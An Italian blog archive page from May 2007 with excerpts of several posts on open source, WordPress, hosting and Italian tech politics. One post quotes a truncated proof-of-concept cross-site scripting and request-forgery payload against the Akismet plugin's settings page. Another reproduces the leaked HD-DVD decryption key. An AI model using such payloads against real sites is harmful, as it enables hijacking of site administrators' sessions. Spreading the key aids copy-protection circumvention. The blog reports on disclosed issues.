Passa ai contenuti principali

Post

Visualizzazione dei post da Maggio, 2007

OSSTMM Professional Security Tester (OPST)

La certificazione OPST è la certificazione ufficiale per i test di sicurezza basati sull'Open Source Security Testing Methodology Manual. L'obiettivo del percorso formativo - basato su tre moduli - è quello di fornire il trasferimento di know-how necessario per poter considerare la prsona un abile security tester, capace di lavorare autonomamente.

I moduli si focalizzano sulle specifiche competenze tecniche necessarie al security testing professionale e sui business skills necessari per fornire motivazione, efficienza e comprensione delle odierne necessità aziendali.

Il conseguimento della Certificazione OPST prevede il superamento di un esame di tipo "hands-on", nel quale viene richiesto l'impiego delle competenze acquisite, individuando le vulnerabilità esistenti di un vero network remoto e fornendo i necessari piani di rientro alle problematiche riscontrate.

Il perforso di certificazione professionale è composto dai seguenti corsi di Security Training:

Pratical …

Google vs. Live

Da Google certo non mi aspetto che faccia pubblicità al servizio Live.com di Microsoft, soprattutto ricercando una parola di comune uso come live (Ah! Semantica). Ma almeno quelli di Microsoft avrebbero potuto mettere il proprio link sugli advertise no? Sbaglio Romeo? ;)

Wordpress: Akismet XSS Security Flaw

Ed eccovi qua il bug del giorno, che mi tocca in quanto utilizzatore sfegatato della piattaforma wordpress e del suo inseparabile plugin anti spam (molto da migliorare IMHO!)

WordPress 2.1.3 Akismet Vulnerabilità - Exploit
Gli utenti WordPress che utilizzano il plugin Askimet per combattere lo spam nei commenti farebbero bene a sostituire il plugin "buggato" rilasciato di default con la versione 2.1.3 di WP con Askimet v2.0.2.
Wordpress: Akismet XSS Security Flaw (Beware of the Dog!) ~ mybeNi websecurity
Michael publicated here an advisory about an Akismet Security Vulnerability (Wordpress’ popular antispam plugin), the fixed version is avaible.
<html> <body> <form action=”http://blog.url/wp-admin/plugins.php?page=akismet-key-config” method=”post” id=”akismet-conf”> <input name=”_wpnonce” value=”‘” type=”text”> <input name=”_wp_http_referer” value=”‘%22><script>eval(String.fromCharCode( 97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,…

OpenDrink project

Open vuol dire comunitàIl paragone anche se non dei più corretti è voluto.
Una comunità per crescere deve essere aperta, come un progetto open source ha bisogno di una comunità per crescere.

La nostra comunità, o meglio la nostra famiglia, ha scelto di usare il forum ed il wiki.
Quando l'open varca la soglia del tecnico...

Pidgin 2.0 Released - Software Freedom Law Center

Mi sono sempre domandato come mail il progetto gaim "stentasse" sempre a decollare. Le release saltuarie poi sono state oggetto di studio di un mio lavoro di statistica sulla stocasticità degli eventi.

E' stato sempre e solo l'unico progetto quotato per essere l'Instant Messanger (IM) di riferimento, perchè integrato con Gnome e preso come riferimento (anche se in beta) da distro come Ubuntu.

Allora come mai? Eccoti una prima risposta. Il progetto Gaim è stato sempre in lotta con AOL per il nome (bontà loro) e magari qualche pensierino legale li teneva distolti dal programmare ... ma magari è!

Pidgin 2.0 Released - Software Freedom Law Center
After months of legal negotiations with AOL, Gaim has changed its name to Pidgin and released Pidgin 2.0.

In order to respond to the threat of legal action from AOL, the Gaim developers had retained the Software Freedom Law Center (SFLC) to help them respond to AOL's objections to the name "Gaim."

"The Software …

Ho messo via ...

Perché dove si fermano i treni un pezzo di vita scende e se ne va.

I love P2P

... ed io amo voi!

Mi piacerebbe conoscere il nome di geni come questi :)

Grazie a Matti per la segnalazione

Assistenza Aruba - andrealazzari.eu

assistenza.aruba.it
Gentile servizio assistenzanon riesco ad utilizzare il pannello di controllo per il dominio in oggetto.
La pagina admin.andrealazzari.eu non viene visualizzata affatto(!!!), ed alternativamente ricevo in risposta i seguenti errori http: 404 (not found), 500 (Internal Server Error)

Dovrei impostare i seguenti name server per il dominio in questione

* NS1.WORDPRESS.COM
* NS2.WORDPRESS.COM
* NS3.WORDPRESS.COM

Sareste così gentili da darmi una mano?

Cordialità
... tutto questo per un servizio che pago? A questo punto penso proprio che "quello sbagliato" sono io

Attendo riscontri da parte loro!

-------------

Edit:
La modifica è stata apportata. Entro 24/48 ore tutti i dns saranno aggiornati al cambio. Le consiglio anche di svuotare la cache dei file temporanei del suo browser che potrebbero avere in memoria le vecchie pagine del sito e comprometterle la visualizzazione.

Cordiali Saluti.
E' la terza volta (per il terzo dominio) che mi rispondono allo stesso modo.

Qualcuno…

L'Associazione per il Software Libero offre 50.000.000 di Euro al Governo

L'Associazione per il Software Libero offre 50.000.000 di Euro al Governo « pollycoke :)


COMUNICATO STAMPA
=====================================
L’Associazione per il Software Libero offre 50.000.000 € al Governo
=====================================

Lunedì 7 Maggio presso la Sala Stampa di Palazzo Chigi, il Ministro dell’Università e della Ricerca, Fabio Mussi, il Ministro per le Riforme e le Innovazioni nella Pubblica Amministrazione, Luigi Nicolais, assieme all’amministratore delegato di Microsoft Italia, Marco Comastri, hanno presentato alla stampa un protocollo d’intesa che prevede un rapporto di collaborazione che ha come obiettivi principali la formazione, il trasferimento tecnologico e la facilitazione di progetti di ricerca.

L’aspetto sicuramente più interessante dell’accordo è costituito dal fatto che malgrado non si sappia ancora quanto costerà questa operazione ai cittadini italiani, Microsoft si è resa disponibile ad erogare ben 737.300 euro in tre anni, ovvero 245.766 euro…

Lettera a Beppe

Spettabile Beppe Grillo,
lunedì 7 maggio, nonostante le promesse elettorali, il governo ha siglato un accordo con Microsoft per promouvere tre Innovation Center, finanziati in parte da Microsoft, e in parte COI SOLDI DELLE NOSTRE TASSE.
Questa cosa è scandalosa, e ti preghiamo di prendere iniziativa al fine di togliere dalle scatole TUTTE LE IMMONDIZIE INFORMATICHE che questa e altre multinazionali riversano nelle nostre pubbliche amministrazioni, SPRECANDO miliardi di euro delle nostre tasse. Il governo l’aveva promesso, ora non sta mantenendo quanto detto.Il software libero, in particolare Linux, permettono una qualità migliore, meno vincoli, più compatibilità, più sicurezza, MENO COSTI. Il software libero doveva essere promosso nella Pubblica Amministrazione, E LO SARA’ !!!
Signor Beppe Grillo, ci pensi Lei! Noi la sosterremo!GrazieUn italiano incazzato e stanco, oppure
Una italiana incazzata e stanca.

Questo il link

http://www.beppegrillo.it/contattaci.php

Scegliete Scrivi a Beppe -> …

Per il bene dell'Italia? Ma siamo matti?

Per il bene dell'Italia: il Governo ha convinto Microsoft a passare al Software Libero? « pollycoke :)

Ricordate il post “Storica vittoria per l’Associazione per il Software Libero“, pare ci siano sviluppi. Voi fatevi pure ingannare dal titolo ottimista, credo sia lo spirito giusto.
Punto Informatico

L'mp3 della seduta

Due pdf della convenzione: 1, 2

Commento di nandoofen:
E mac-donald? E la coca-cola? E la philiph-morris di cui sono “grande sostentatore”?
Potrebbero aderire anche loro all’open? Ci regalerebbero cheeseburger, lattine e sigarette? O magari ci fornirebbero le loro ricette? Avete mai provato a farvi un cheeseburger a casa? Qualcuno è mai riuscito ad eguagliare il sapore del buon zio Mac?
Altro commento:
Io sono fermamente convinto che scelte del genere siano pilotate più da “ignoranza” che dalla volontà di farsi “foraggiare” da qualche produttore di software.
In Italia, specialmente nelle pubbliche amministrazioni (ma non solo), c’è molta pigrizia mentale nel affrontare ar…

Joost™ invite

Joost™
Try out Joost beta – Now For Friends
How to get an invite?
The new way of watching TV
All the things you love about TV, fused with the interactive power of the internet – just the way you want it.
Enjoy the ride!
Someone want an invite to Joost Project? Just ask!

Leave a request here and I'll send invite to comment email field! SeeYa! :)

Ultra Mobile Personal Computer

Devo proprio dire che la nuova piattaforma mi aggrada, semplice, abbastanza funzionale (connessione dell'uni permettendo) e famigliare ma venendo da un wordpress.org non poteva che essere così.

Particolarmente interessante è il tag surfer.

Funziona come una specie di feedreader dove però specifico quali sono i TAG che voglio vengano visualizzati. Così facendo posso leggere tutta una serie di articoli che sono stati taggati allo (mio) stesso modo dagli altri membri della community ... ed ecco una sorpresa!
Ultra Mobile Personal Computer... e io "perplimo" da pollycoke :)



Solo pensare di avere un "computing" così pervasivo mi fà fibrillare il cuore... Polly "perplime" io ... sono esterrefatto!

Chi ha notato l'interfaccia "multitouch" del dispositivo della ragazza alzi la mano!

Che i media/dispositivi non manchino?

Che manchino i servizi? O manca la fantasia?

Forse mancano i soldi! ;)

PS: in merito a wordpress - mi sento come un bambino a cui è stat…

Copertura ADSL in Italia

Copertura ADSL in Italia da Wikipedia
I gestori di comunicazioni forniscono agli ISP connessioni xDSL solo su richiesta di almeno 1.000 utenti, che firmano un pre-contratto col gestore telefonico nel quale si impegnano a pagare il servizio ADSL; non sempre è presente una clausola che ne prevede lo scioglimento in caso di mancata attivazione del servizio (falso se si fanno richieste a Telecom per la sua ADSL si paga solo se questa viene attivata), per cui si paga un servizio che non si è ottenuto (falso per i motivi sopra). Forse questo spiega la scarsa diffusione dei pre-contratti.

La soglia dei 1.000 pre-contratti ADSL limita drasticamente la copertura. Degli 8100 comuni italiani, 5.800 (più della metà) hanno una popolazione (censita) con meno di 5.000 abitanti. Solo l'8% di questi è coperto da ADSL che dunque esclude non pochi dei 57 milioni di italiani.

Telecom dichiara che le centrali telefoniche, meglio dette stadio di linea coperte sono 3.000 delle 10.500 totali. Ogni comune è …

09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 is the magic number

That ‘magic’ number »
This is everywhere today. Every major news site has this ‘magic’ number in it. Digg.com had stories with more than 24.000 diggs (that’s actually the first time I see that many).In case you’ve been in a cave for the last 24 hours, the number above is the ‘Processing Key’ for most movies released so far (in HD-DVD format). This, along with other things, enables users to watch HD-DVD movies in GNU/Linux. That same number also made possible the creation of BACKUPHDDVD.
Since a number CANNOT be copyrighted, share it! Not everyone is interested in piracy …
E come esimersi dal condividere una così splendida serie di caratteri esadecimali?!

Cos'è? Come cos'è!

Beh! Per chi non fosse pratico di inglese è la chiave di "decifrazione"degli HD-DVD (utilizzabile per decrittografarne "alcuni" da qui ai prossimi mesi), amabilmente scritta in ogni dove dopo che il RIAA s'è presa la bega di intimidire chiunque la diffondesse. Spesso si ha più successo c…

FreeUser.Org

Reborn!

Abbandonato l'obsoleto servizio di hosting di aruba, ho deciso pigramente (forse come dice Romeo) di affidarmi totalmente ad un provider dedicato, e relegare (ancora per poco) Aruba.it alla gestione dei miei domini.

In attesa che i dns si aggiornino totalmente (? - vi farò leggere un giorno la bizzarra risposta dell'assistenza tecnica)

In attesa che il CNAME www.freeuser.org cessi la sua esistenza a favore del redirect a freeuser.org

In attesa che andrealazzari.eu (ri)sorga

... mi godo il mio nuovo servizio di blogging!

Thanks to Wordpress.com (Grazie poi nemmeno tanto costa cmq 10$/y ;) )

PS: Grazie alle FAQ e all'assistenza tecnica TnX Mark ;)

YouTube This!

YouTube Support « WordPress.com
Follow closely: I found the video above on this page. To embed it in the post all I had to do was copy and paste the URL I just linked and then paste it into the post with special formatting, like this:
[ youtube=http://youtube.com/w/?v=_dIya1aJJKA]
Try it yourself, copy and paste the above into your blog and see what happens. Now browse to another video on YouTube and copy and paste the link as above and paste it in your blog. If this goes well, we’ll be adding support for more and more services using a similar syntax.
Two features in one night? This feels good.
Anche qui recita un pò come nel post sotto... due righe di codice e ...

[VIDEO RIMOSSO youtube=http://www.youtube.com/watch?v=byO6o4zZaFM]

Buona visione ;)

Digg This!

Partendo dall'assunto che ho capito ... (il che è tutto da dimostrare) ... il post di Matt recita:
To add this to your post, just put in [ digg=http://digg.com/url_to/story_on_digg ] and it’ll be transformed into a “Digg This” button. (Your story must already be submitted to Digg for this to work.) I’ve added a Digg This button to the right for this very post you’re reading, why not try voting on it to test things out?
Quindi, io aggiungo il codice lì sopra e ...

[digg=http://digg.com/software/WordPress_com_adds_suspport_for_Digg_buttons]

O madre.... Fantastico :)